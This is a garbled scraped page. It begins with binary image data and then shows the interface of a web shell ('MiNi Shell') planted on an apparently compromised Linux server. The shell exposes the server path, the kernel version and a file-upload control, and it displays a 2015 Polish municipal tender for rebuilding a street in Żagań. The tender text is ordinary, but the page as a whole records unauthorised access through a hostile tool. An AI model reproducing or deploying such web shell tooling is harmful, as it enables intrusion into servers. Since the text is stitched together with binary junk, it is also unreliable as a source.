JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151006/145755-N-2015.html

<p class="kh_header"><b>Żagań: BUDOWA NAWIERZCHNI ULICY TARTAKOWEJ  W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 145755 - 2015; data zamieszczenia: 06.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA NAWIERZCHNI ULICY TARTAKOWEJ  W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUDOWA NAWIERZCHNI  ULICY TARTAKOWEJ W ŻAGANIU.
3.1. Przedmiotowa droga zlokalizowana jest w południowej części miasta Żagań. Stanowi ona drogę znaczenia lokalnego,  prowadzi do okolicznych zabudowań jednorodzinnych. Ulica Tartakowa wyposażona jest obecnie w jezdnię o nawierzchni z destruktu  bitumicznego szerokości  6,80 m. Teren objęty opracowaniem stanowi pas drogowy bez chodnika. Na terenie objętym inwestycją występuje uzbrojenie podziemne : kanalizacja sanitarna, wodociąg, linie telekomunikacyjne i naziemne linie energetyczne.
Niniejszy projekt zakłada gruntowną przebudowę nawierzchni jezdni na nawierzchnię bitumiczną. Ponadto w ramach przebudowy ulicy Tartakowej przewidziano budowę chodnika i zjazdów na posesje z kostki brukowej betonowej. Projektowany chodnik będzie przylegał  do istniejącego jak i nowoprojektowanego odcinka ulicy (na długości działki nr 2042).

3.2. Zakres  przewidywanych  robót  obejmuje:
1)  przebudowa nawierzchni jezdni, 
2) budowa chodnika,
3) przełożenie istniejących krawężników,
4) rekultywacja istniejących terenów zielonych,
5) wykonanie wszystkich niezbędnych robót budowlanych zapewniających prawidłowe  połączenie przebudowanych nawierzchni z nawierzchniami istniejącymi nie podlegającymi 
    wymianie lub remoncie  (np. na granicy pasa drogowego), połączenia przebudowanych
    nawierzchni z istniejącymi wejściami do budynków, wjazdami na posesję, itp. oraz
    wszystkich robót niezbędnych do prawidłowego funkcjonowania przebudowywanego 
    układu komunikacyjnego.

3.3. Zakres  przewidywanych  robót  w szczególności  obejmuje:
1) roboty przygotowawcze i ziemne :
      - rozbiórka istniejącej nawierzchnia jezdni z destruktu bitumicznego                        z 
        jednoczesnym wywozem i utylizacją, 
      - rozbiórka krawężników kamiennych , oczyszczenie  i przygotowanie do powtórnego 
        montażu,
      - zdjęcie warstwy humusu  z wywiezieniem i utylizacją,
      - prace geodezyjne  związane z naniesieniem punktów wysokościowych                    i 
        ukształtowania  terenu w sposób zapewniający sprawny spływ wód opadowych i 
        odwodnienia drogi,
2) prace nawierzchniowe jezdni :
      - podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie,
      - ustawienia krawężników,
      - warstwa wiążąca jezdni AC 22W (asfalt 50/70),
      - warstwa ścieralna  AC11S (asfalt 50/70),
3) chodnik :
      - podsypka cementowo - piaskowa 1:6,
      - ustawienia krawężników i obrzeży (wszystkie krawężniki i obrzeża ustawiać na ławach 
        betonowych z oporem wykonanych w deskowaniu z betonu klasy C 12/15 o 
        konsystencji K 1, od strony chodników i terenów zielonych należy spoinować 
        specjalistyczną zaprawą do fugowania),
      - warstwa wierzchnia z kostki betonowej typu cegła koloru szarego,
4) zjazdy indywidualne :
      - podbudowa zasadnicza z betonu,
      - podsypka cementowo-piaskowa 1:4,
      - warstwa ścieralna  z kostki betonowej typu cegła koloru czerwonego,
5) tereny zielone (nowo projektowane i regenerowane tereny zielone) : 
      - rozścielenie warstwy humusu gr. 15 cm,
      - dozowanie nawozów i preparatów odchwaszczających,
      - siew nasion traw niskich.

3.4. Uzgodnienia branżowe obejmują istniejące :  
1) sieci wodociągowo-kanalizacyjne  -  ŻW i K Sp. z o.o. w Żaganiu, 
2. otoczenie  strefy ochrony konserwatorskiej  - LWKZ  Wojewódzki  Urząd Ochrony  
     Zabytków w Zielonej Górze,  
3) sieci energetyczne - Enea Operator sp. z o.o., 
4) sieci telekomunikacyjne  - Orange Polska  S.A..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają  
     obowiązku posiadania  takowych uprawnień typu koncesja, zezwolenie, licencja,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten 
    wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert , 
    a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie,  wykonał co najmniej 
    dwie roboty budowlane,  polegające na budowie, przebudowie lub remoncie drogi o 
    wartości minimum 200 000,00 zł. brutto dla każdego zadania.    
    Na potwierdzenie spełnienia tego warunku  Wykonawca złoży wraz z ofertą dokument 
    określony w punkcie 6.1  podpunkt 2 SIWZ. 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
    Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
    charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
    obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
    trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
    potrzeby  wykonania zamówienia oraz składając dokumenty dotyczące tego podmiotu 
    określone w punkcie 6.2 SIWZ.
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, 
    chyba że za  nieudostępnienie zasobów nie ponosi  winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający 
    uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował co najmniej 
    jedną osobą : 
    - posiadającą uprawnienia budowlane do kierowania robotami  budowlanymi w 
      specjalności drogowej lub dysponującą innymi uprawnieniami  umożliwiającymi 
      wykonywanie tych samych czynności, do wykonywania których  uprawniają w aktualnym 
      stanie prawnym uprawnienia w w/w  specjalności.
    Na potwierdzenie spełnienia powyższych warunków, Wykonawca złoży wraz z ofertą 
    dokument  określony w  punkcie 6.1 podpunkt 3 SIWZ 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
    W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
    może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego 
    łączących go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest udowodnić    
    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w    
    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do 
    oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia 
    oraz składając dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ.
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, 
    chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający uzna za spełniającego te 
    wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w 
    zakresie prowadzonej działalności  gospodarczej związanej z przedmiotem zamówienia  i 
    na potwierdzenie  spełnienia tego warunku złoży wraz z ofertą  dokument określony w 
    punkcie 6.1 podpunkt 4 SIWZ.  
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu 
    robót budowlanych wymienionych w wykazie, dotyczy najważniejszych robót,  
    polegających na budowie, przebudowie lub remoncie drogi o wartości minimum 200 000
     zł. każda.     
    W przypadku gdy Zamawiający jest podmiotem na rzecz którego roboty  wskazane w 
    wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
    poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ewentualne pełnomocnictwo w zakresie określonym w SIWZ.
Poglądowy kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwaracji( w miesiącach) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy :
1) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem  że:  
   
   a) prace objęte umową o wykonanie robót budowlanych zostały wstrzymane przez 
       właściwe organy z przyczyn niezależnych od Wykonawcy, 
   b) wystąpiły nietypowe dla  danej pory roku  warunki atmosferyczne, które ze względów 
       obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z normami  
       techniczno-budowlanymi, co uniemożliwia  terminowe zakończenie realizacji przedmiotu 
       umowy,
   c) w wyniku działania siły wyżej (klęski żywiołowe :  trzęsienia ziemi, pożary, powodzie,  
       tornada,  wichury itp.), mające wpływ na terminowość robót budowlanych, 
   d) zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie   planowania 
       inwestycji o wykonanie robót budowlanych danych,  zgody osób trzecich  lub właściwych 
       organów. 
   Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub postoju;
    
2) w zakresie zmiany lub rezygnacji z podwykonawcy : 
   a)  na którego zasoby Wykonawca  powoływał się w celu wykazania spełnienia warunków 
        udziału w postepowaniu, lub 
   b)  z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia   
        publicznego,   
    pod warunkiem, że : - Wykonawca  wykaże, iż proponowany inny podwykonawca spełni 
    warunki udziału w postepowaniu w stopniu nie mniejszym niż wymagany w trakcie 
    postepowania o udzielenie zamówienia; lub 
    -  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w stopniu 
    nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia; 

3) w zakresie zmiany kierownika budowy, za uprzednią pisemną zgodą Zamawiającego, 
     w przypadku, gdy: 
     a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w  przypadku  
           - choroby lub innych zdarzeń losowych dotyczących kierownika, 
           - nie wywiązywania się kierownika budowy z obowiązków wynikających z Umowy 
              zawartej w ramach przedmiotowego zamówienia, 
           - jeżeli zmiana kierownika budowy stanie się konieczną z jakichkolwiek przyczyn 
             niezależnych od Wykonawcy (np. rezygnacji), 
     b) Zamawiający zażąda  zmiany kierownika budowy gdy  uzna, że nie wykonuje on 
          swoich obowiązków wynikających z Umowy zawartej w ramach przedmiotowego 
          zamówienia bądź unika kontaktu  z inwestorem.. 
     W przypadku zmiany kierownika budowy, nowy kierownik budowy musi spełniać
     wymagania określone w Ogłoszeniu o zamówieniu dla powyższych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl         http://www.bip.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy 
Urząd Miasta Żagań, Plac Słowiański 17, pok.26 , 68-100 Żagań , Wydział Zamówień Publicznych i Nadzoru Właścicielskiego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2015 godzina 11:00, miejsce: Urząd Miasta Żagań, Plac Słowiański 17, pok.26 , Wydział Zamówień Publicznych i Nadzoru Właścicielskiego, 68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com